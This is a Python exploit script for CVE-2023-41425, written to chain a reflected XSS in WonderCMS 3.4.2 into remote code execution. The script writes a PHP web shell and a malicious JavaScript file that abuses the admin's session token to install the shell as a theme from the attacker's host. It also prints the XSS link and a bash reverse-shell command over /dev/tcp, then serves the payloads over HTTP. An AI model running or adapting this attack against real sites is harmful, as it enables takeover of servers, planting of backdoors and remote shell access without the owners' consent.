# Exploit Title: WonderCMS 3.4.2 - Remote Code Execution (RCE)
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# CVE: CVE-2023-41425

import requests
import argparse
from argparse import RawTextHelpFormatter
import os
import subprocess
import zipfile
from termcolor import colored

def main():
    parser = argparse.ArgumentParser(description="Exploit Wonder CMS v3.4.2
XSS to RCE", formatter_class=RawTextHelpFormatter)
    parser.add_argument("--url", required=True, help="Target URL of
loginURL (Example: http://sea.htb/loginURL)")
    parser.add_argument("--xip", required=True, help="IP for HTTP web
server that hosts the malicious .js file")
    parser.add_argument("--xport", required=True, help="Port for HTTP web
server that hosts the malicious .js file")
    args = parser.parse_args()

    target_login_url = args.url
    target_split = args.url.split('/')
    target_url = target_split[0] + '//' + target_split[2]

    # Web Shell
    print("[+] Creating PHP Web Shell")
    if not os.path.exists('malicious'):
        os.mkdir('malicious')
        with open ('malicious/malicious.php', 'w') as f:
            f.write('<?php system($_GET["cmd"]); ?>')
        with zipfile.ZipFile('./malicious.zip', 'w') as z:
            z.write('malicious/malicious.php')
        os.remove('malicious/malicious.php')
        os.rmdir('malicious')
    else:
        print(colored("[!] Directory malicious already exists!", 'yellow'))

    # Malicious .js
    js = f'''var token =
document.querySelectorAll('[name="token"]')[0].value;
var module_url =
"{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token="
+ token;
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("GET", module_url);
xhr.send();'''

    print("[+] Writing malicious.js")
    with open('malicious.js', 'w') as f:
        f.write(js)


    xss_payload = args.url.replace("loginURL",
"index.php?page=loginURL?")+"\"></form><script+src=\"http://
"+args.xip+":"+args.xport+"/malicious.js\"></script><form+action=\""
    print("[+] XSS Payload:")
    print(colored(f"{xss_payload}", 'red'))

    print("[+] Web Shell can be accessed once .zip file has been
requested:")

print(colored(f"{target_url}/themes/malicious/malicious.php?cmd=<COMMAND>",
'red'))
    print("[+] To get a reverse shell connection run the following:")
    print(colored(f"curl -s '{target_url}/themes/malicious/malicious.php'
--get --data-urlencode \"cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT>
0>&1'\" ", 'yellow'))

    print("[+] Starting HTTP server")
    subprocess.run(["python3", "-m", "http.server", "-b", args.xip,
args.xport])

if __name__ == "__main__":
    main()